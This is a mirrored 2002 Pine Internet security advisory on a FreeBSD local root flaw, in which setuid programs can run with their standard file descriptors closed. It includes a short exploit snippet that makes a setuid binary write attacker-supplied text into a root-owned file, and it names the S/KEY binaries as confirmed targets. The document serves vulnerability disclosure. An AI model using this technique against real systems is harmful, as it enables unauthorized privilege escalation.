Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:2826
HistoryApr 23, 2002 - 12:00 a.m.

Pine Internet Advisory: Setuid application execution may give local root in FreeBSD

2002-04-2300:00:00
vulners.com
9
JSON

-----BEGIN PGP SIGNED MESSAGE-----

Pine Internet Security Advisory

Advisory ID : PINE-CERT-20020401
Authors : Joost Pol <[email protected]>
Issue date : 2002-04-22
Application : Multiple
Version(s) : Multiple
Platforms : FreeBSD confirmed, maybe others.
Vendor informed : 20020406
Availability : http://www.pine.nl/advisories/pine-cert-20020401.txt

Synopsis

    It is possible for a local user to execute a suid application with 
    stdin, stdout or stderr closed.

Impact

    HIGH. Local users should be able to gain root privileges.

Description

    Consider the following &#40;imaginary&#41; suid application:

    -- begin of imaginary code snippet

            FILE * f = fopen&#40;&quot;/etc/root_owned_file&quot;, &quot;r+&quot;&#41;;

            if&#40;f&#41; {
            
                    fprintf&#40;stderr, &quot;&#37;s: fopen&#40;&#41; succeeded&#92;n&quot;, argv[0]&#41;;

                    fclose&#40;f&#41;;
            }

    -- end of imaginary code snippet
            
    Now, consider the following &#40;imaginary&#41; exploit:

    -- begin of imaginary exploit snippet

            while&#40;dup&#40;1&#41; != -1&#41;; 

            close&#40;2&#41;;

            execl&#40;&quot;/path/to/suid_application&quot;,
                  &quot;this text will endup in the root_owned_file&quot;, 0&#41;;

    -- end of imaginary exploit snippet

    Exploitation has been confirmed using the S/KEY binaries.

Solution

    FreeBSD source trees have been updated on the 21th of april 2002. 
    Please cvsup.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBPMPQffplhmN+UTQRAQE/bggAwkCUhmkv5QUVVE/pUcHIkN26Txa0Pv6T
4q4Iu4TKi6YhJYJ5Jlh0YhlgkurVE7/qAokvxEfdgHQTR68uCPJhDQTKp/9uJ+PG
qt+InMh7NHaOdIvEjcH74D9zxEC14uH+SrXmmmZno601d9mLcBZyKs0ZgOFCBnJr
QToyEgs709xtnbs5OP8iPxn6dhZADMPM9NJbtU2EvkSUqRoDB8H1awUAANI/8RzJ
4HOLDkFOkYFaNFvbYMULStGU5nH9OTHtOuTw7decgHBK6h9H8FhYf8Yn2hMq8wf0
p8/v5m535gPHqoX9HWvfMw2LdIr36mol5K9br9033XrOdIG5itn5aQ==
=AMED
-----END PGP SIGNATURE-----


patrick oonk - pine internet - [email protected] - www.pine.nl/~patrick
T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl
PGPid A4E74BBF fp A7CF 7611 E8C4 7B79 CA36 0BFD 2CB4 7283 A4E7 4BBF
Note: my NEW PGP key is available at http://www.pine.nl/~patrick/
Excuse of the day: it has Intel Inside

JSON